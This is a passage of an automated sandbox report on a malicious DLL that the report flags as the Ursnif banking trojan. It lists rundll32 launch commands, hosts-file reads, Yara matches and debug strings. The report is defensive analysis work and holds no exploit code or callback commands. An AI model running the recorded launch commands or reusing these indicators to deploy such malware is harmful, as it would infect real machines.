                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@14/7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00754A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4680
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6048
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 6yDD19jMIu.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 6yDD19jMIu.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED1AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED1AB9A push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
